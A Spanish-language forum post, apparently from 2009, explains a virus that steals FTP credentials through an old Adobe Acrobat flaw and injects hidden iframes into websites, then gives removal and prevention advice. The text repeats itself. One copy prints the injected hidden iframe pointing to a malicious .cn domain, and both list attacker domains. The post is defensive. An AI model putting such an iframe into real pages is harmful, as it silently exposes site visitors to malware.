Introducción
Si estás teniendo problemas con este virus sé que vas a leer este post con atención.
He leído otros comentarios similares al respecto en taringa, hay muy poquitos y son muy breves y la información es, en generl, deficiente.
Hay un virus que anda dando vueltas que opera de la siguiente manera:
1- Cuando ingresás a páginas amigas infectadas, te bajás un archivo .pdf o .swf que, aprovechando vulnerabilidades de los respectivos acrobats, busca contraseñas y accesos ftp.
2- Se conecta con tus sitios via ftp sitios y los infecta.
3- Sobreescribe los archivos index.php, index.html, y otros (gestores como joomla o wordpress son vulnerables a este ataque). Ingresa un pedacito de código que redirecciona a páginas peligrosas para seguir con el ciclo, infectando a los usuarios de tu página.
El tema es que accede a todas las conexiones ftp que tengas e infecta todos los sitios que estés administrando. De modo que puede convertirse en un verdadero problema.
A continuación, explicaremos cómo reconocerlo y cómo evitar y solucionar este inconveniente.
Reconocimiento del virus y del iframe escondido
En mi caso, mi antivirus (yo utilizaba el avira y hacía escaneos online con el nod) no lo había detectado. El problema saltó cuando el google marcó mis sitios como peligrosos. En el buscador aparece un cartel debajo del título de la página que dice "Este sitio puede dañar tu equipo." y cuando ingresamos al sitio nos dice: "Advertencia- Si visitas este sitio web, tu equipo puede resultar dañado." y nos enlaza a una página de "Navegación segura" en la que diagnostican el problema.
Si esto no sucede te recomiendo usar el avast que lo encuentra (debés escanear tu máquina y los directorios de tu server), si alguien conoce otro antivirus efectivo, que lo recomiende.
Dicen que el antispyware *** lo reconoce pero no estoy seguro. De todas formas no está mal agregar esta herrmienta a nuestra batería de antispywares.
Si ni el google ni el antivirus les dice nada pero verifican que automáticamente se agregan líneas de código a los archivos de su sitio pueden utilizar esta herramienta:
que es muy efectiva. Ténganla en cuenta para verificar que todo está bien una vez que hayan solucionado el problema. Si están infectados, esta herramienta se lo indicará y presentará un informe similar a este:
Anatomía del virus
Una vez que se hizo de tus contraseñas y accesos ftp, el virus ingresa en tu hosting. Se instala presumiblemente en un archivo llamado image.php o similar y comienza a injertar líneas de código en tus archivos index.php, index.html y otros. El código que injerta puede lucir como este:
Los nombres de dominio pueden ser diferentes pero suelen terminar en .cn o .ru
Aquí hay una lista de dominios que puede injertar aunque siempre salen nuevos:
* lotultimatebet .cn
* lotmachinesguide .cn
* cheapslotplay .cn
* homenameregistration .cn (added: 04.22.2009)
* litegreatestdirect .cn (added: 04.25.2009)
* playbetwager .cn (added: 04.25.2009)
* nameashop .cn (added: 04.29.2009)
* mainnameshop .cn (added: 04.29.2009)
* superlitecarbest .cn (added: 04.29.2009)
* internetnamestore .cn (added: 04.30.2009)
* dotcomnameshop .cn (added: 05.02.2009)
* mediahomenamemartvideo .cn (added: 05.11.2009)
Diagnóstico de navegación segura
Por el momento, google no detecta la mayoría de los sitios infecatados con este virus, muchos de los sitios infectados no figuran como sospechosos. Y muchos de los dominios .cn o .ru que están utilizando para atacar no están en las listas negras. No descarto que aparezcan dominios nuevos con nombres diferentes.
Cuando google detecta el contenido malicioso te aparece un cartel que dice algo así como:
Vulnerabilidad del Adobe Acrobat
Aquí hay un reporte del análisis de un pdf infectado utilizado para ingresar el virus:
El virus utiliza una vulnerabilidad del acrobat 8 o anteriores que es la siguiente:
De modo que, si estás utilizando el acrobat 8.1.2 o anterior, actualizalo a la versión actual, que es la 9.1.
El virus descarga silenciosamente un binario malicioso (Windows executable) de una de los sitios infectados alojado, generalmente, en el mismo servidor al que el iframe direcciona. De modo que se perpetua el ciclo.
De acuerdo a virus total, la detección del virus es muy baja (3/40, es decir, sólo de un 7.5%)
Todo el mundo recomienda al nod pero como les dije, a mí me funcionó solamente el avast (con un amigo, también infectado, funcionó sólo el avast).
¿Cómo evitar infectarse de este y otros virus similares?
1- Hay que tener una versión de windows actualizada. En mi caso, utilizo en el windows xp sp3.
2- Tener instalado un antivirus full y hacer escaneos online periódicos con otros antivirus.
3- Utilizar algunos antispywares. En mi caso utilizo el ***, el spybot search and destroy, el adware y el spywareblaster. Además, uso el ccleaner para limpiar el registro.
4- Tener actualizado el acrobat. Aquí les dejo el link de descarga al acrobat reader 9:
5- No dejar ninguna contraseña guardada en la máquina. Particularmente, no debemos dejar la que nos permite ingresar via ftp a nuestro hosting.
5- Utilizar un firewall y dejarlo activado.
6- Cambiar todas nuestras contraseñas una vez por semana. Particularmente, las de acceso via ftp. Es recomendable utilizar sftp a ftp para volver a conectarnos con nuestro hosting.
7- Hacer back ups periódicos de nuestro sitio. De modo de poder restituirlo si es necesario.
8- Periódicamente chequear nuestro sitio con herramientas como unmask parasites para asegurarnos de que todo esté bien.
Eliminando el virus
1- Aunque eliminemos el virus de nuestro hosting, siempre es más importante comenzar eliminando el virus de nuestra máquina. De lo contrario, el virus volverá a afectar nuestro sitio.
De modo que deberíamos empezar por ingresar en nuestra PC en modo a prueba de fallos y escanear con el antivirus. Como dije antes, el avast y el *** lo encuentran.
Pero lo que yo recomiendo es hacer borrón y cuenta nueva, es decir, formatear e instalar todo de vuelta.
2- Una vez que estemos seguros que ya sea escaneando, ya sea formateando, hemos limpiado nuestra máquina, debemos cambiar todas nuestras contraseñas, particularmente las que nos permiten acceder via ftp a nuestro sitio. Recomiendo NO dejarlas guardadas en la máquina y volver cambiarlas una vez por semana. Es recomendable utilizar sftp a ftp para volver a conectarnos.
3- Ahora debemos remover el código malicioso de nuestro hosting. Si el sitio tiene un tamaño decente, limpiarlo a mano es casi imposible. Y los antivirus fallan en esta tarea. De modo que recomiendo borrar todo y sustituirlo por un back up de momentos previos a la infección.
Para saber si este back up está infectado, deben escanearlo con el antivirus y utilizar la herramienta que les comenté anteriormente: unmask parasites y chequear que todo esté bien. Si el back up está infectado, deben buscar uno que no lo esté.
5- Escaneen los directorios de su hosting con un antivirus para asegurse de que no quedó código sucio.
6- Si su sitio sigue marcado por google como sospechoso. Hagan una solicitud de reestablecimiento utilizando las herramientas para webmasters de google:
7- Periódicamente chequear nuestro sitio con herramientas como unmask parasites y escanearlo con un antivirus para asegurarnos de que todo esté bien.
8- Cumple con el punto anterior (¿Cómo evitar infectarse de este y otros virus similares?) para evitar que esto te vuelva a suceder.
Fuentes:
Malicious “Income” IFrames from .CN Domains
Si estás teniendo problemas con este virus sé que vas a leer este post con atención.
He leído otros comentarios similares al respecto en taringa, hay muy poquitos y son muy breves y la información es, en generl, deficiente.
Hay un virus que anda dando vueltas que opera de la siguiente manera:
1- Cuando ingresás a páginas amigas infectadas, te bajás un archivo .pdf o .swf que, aprovechando vulnerabilidades de los respectivos acrobats, busca contraseñas y accesos ftp.
2- Se conecta con tus sitios via ftp sitios y los infecta.
3- Sobreescribe los archivos index.php, index.html, y otros (gestores como joomla o wordpress son vulnerables a este ataque). Ingresa un pedacito de código que redirecciona a páginas peligrosas para seguir con el ciclo, infectando a los usuarios de tu página.
El tema es que accede a todas las conexiones ftp que tengas e infecta todos los sitios que estés administrando. De modo que puede convertirse en un verdadero problema.
A continuación, explicaremos cómo reconocerlo y cómo evitar y solucionar este inconveniente.
Reconocimiento del virus y del iframe escondido
En mi caso, mi antivirus (yo utilizaba el avira y hacía escaneos online con el nod) no lo había detectado. El problema saltó cuando el google marcó mis sitios como peligrosos. En el buscador aparece un cartel debajo del título de la página que dice "Este sitio puede dañar tu equipo." y cuando ingresamos al sitio nos dice: "Advertencia- Si visitas este sitio web, tu equipo puede resultar dañado." y nos enlaza a una página de "Navegación segura" en la que diagnostican el problema.
Si esto no sucede te recomiendo usar el avast que lo encuentra (debés escanear tu máquina y los directorios de tu server), si alguien conoce otro antivirus efectivo, que lo recomiende.
Dicen que el antispyware *** lo reconoce pero no estoy seguro. De todas formas no está mal agregar esta herrmienta a nuestra batería de antispywares.
Si ni el google ni el antivirus les dice nada pero verifican que automáticamente se agregan líneas de código a los archivos de su sitio pueden utilizar esta herramienta:
que es muy efectiva. Ténganla en cuenta para verificar que todo está bien una vez que hayan solucionado el problema. Si están infectados, esta herramienta se lo indicará y presentará un informe similar a este:
Anatomía del virus
Una vez que se hizo de tus contraseñas y accesos ftp, el virus ingresa en tu hosting. Se instala presumiblemente en un archivo llamado image.php o similar y comienza a injertar líneas de código en tus archivos index.php, index.html y otros. El código que injerta puede lucir como este:
<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
Los nombres de dominio pueden ser diferentes pero suelen terminar en .cn o .ru
Aquí hay una lista de dominios que puede injertar aunque siempre salen nuevos:
* lotultimatebet .cn
* lotmachinesguide .cn
* cheapslotplay .cn
* homenameregistration .cn (added: 04.22.2009)
* litegreatestdirect .cn (added: 04.25.2009)
* playbetwager .cn (added: 04.25.2009)
* nameashop .cn (added: 04.29.2009)
* mainnameshop .cn (added: 04.29.2009)
* superlitecarbest .cn (added: 04.29.2009)
* internetnamestore .cn (added: 04.30.2009)
* dotcomnameshop .cn (added: 05.02.2009)
* mediahomenamemartvideo .cn (added: 05.11.2009)
Diagnóstico de navegación segura
Por el momento, google no detecta la mayoría de los sitios infecatados con este virus, muchos de los sitios infectados no figuran como sospechosos. Y muchos de los dominios .cn o .ru que están utilizando para atacar no están en las listas negras. No descarto que aparezcan dominios nuevos con nombres diferentes.
Cuando google detecta el contenido malicioso te aparece un cartel que dice algo así como:
El software malicioso se encuentra alojado en 2 dominio(s), entre los que se incluyen u0b.in/, a5i.ru/.
Vulnerabilidad del Adobe Acrobat
Aquí hay un reporte del análisis de un pdf infectado utilizado para ingresar el virus:
El virus utiliza una vulnerabilidad del acrobat 8 o anteriores que es la siguiente:
“Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument“.
De modo que, si estás utilizando el acrobat 8.1.2 o anterior, actualizalo a la versión actual, que es la 9.1.
El virus descarga silenciosamente un binario malicioso (Windows executable) de una de los sitios infectados alojado, generalmente, en el mismo servidor al que el iframe direcciona. De modo que se perpetua el ciclo.
De acuerdo a virus total, la detección del virus es muy baja (3/40, es decir, sólo de un 7.5%)
Todo el mundo recomienda al nod pero como les dije, a mí me funcionó solamente el avast (con un amigo, también infectado, funcionó sólo el avast).
¿Cómo evitar infectarse de este y otros virus similares?
1- Hay que tener una versión de windows actualizada. En mi caso, utilizo en el windows xp sp3.
2- Tener instalado un antivirus full y hacer escaneos online periódicos con otros antivirus.
3- Utilizar algunos antispywares. En mi caso utilizo el ***, el spybot search and destroy, el adware y el spywareblaster. Además, uso el ccleaner para limpiar el registro.
4- Tener actualizado el acrobat. Aquí les dejo el link de descarga al acrobat reader 9:
5- No dejar ninguna contraseña guardada en la máquina. Particularmente, no debemos dejar la que nos permite ingresar via ftp a nuestro hosting.
5- Utilizar un firewall y dejarlo activado.
6- Cambiar todas nuestras contraseñas una vez por semana. Particularmente, las de acceso via ftp. Es recomendable utilizar sftp a ftp para volver a conectarnos con nuestro hosting.
7- Hacer back ups periódicos de nuestro sitio. De modo de poder restituirlo si es necesario.
8- Periódicamente chequear nuestro sitio con herramientas como unmask parasites para asegurarnos de que todo esté bien.
Eliminando el virus
1- Aunque eliminemos el virus de nuestro hosting, siempre es más importante comenzar eliminando el virus de nuestra máquina. De lo contrario, el virus volverá a afectar nuestro sitio.
De modo que deberíamos empezar por ingresar en nuestra PC en modo a prueba de fallos y escanear con el antivirus. Como dije antes, el avast y el *** lo encuentran.
Pero lo que yo recomiendo es hacer borrón y cuenta nueva, es decir, formatear e instalar todo de vuelta.
2- Una vez que estemos seguros que ya sea escaneando, ya sea formateando, hemos limpiado nuestra máquina, debemos cambiar todas nuestras contraseñas, particularmente las que nos permiten acceder via ftp a nuestro sitio. Recomiendo NO dejarlas guardadas en la máquina y volver cambiarlas una vez por semana. Es recomendable utilizar sftp a ftp para volver a conectarnos.
3- Ahora debemos remover el código malicioso de nuestro hosting. Si el sitio tiene un tamaño decente, limpiarlo a mano es casi imposible. Y los antivirus fallan en esta tarea. De modo que recomiendo borrar todo y sustituirlo por un back up de momentos previos a la infección.
Para saber si este back up está infectado, deben escanearlo con el antivirus y utilizar la herramienta que les comenté anteriormente: unmask parasites y chequear que todo esté bien. Si el back up está infectado, deben buscar uno que no lo esté.
5- Escaneen los directorios de su hosting con un antivirus para asegurse de que no quedó código sucio.
6- Si su sitio sigue marcado por google como sospechoso. Hagan una solicitud de reestablecimiento utilizando las herramientas para webmasters de google:
7- Periódicamente chequear nuestro sitio con herramientas como unmask parasites y escanearlo con un antivirus para asegurarnos de que todo esté bien.
8- Cumple con el punto anterior (¿Cómo evitar infectarse de este y otros virus similares?) para evitar que esto te vuelva a suceder.
Fuentes:
Malicious “Income” IFrames from .CN Domains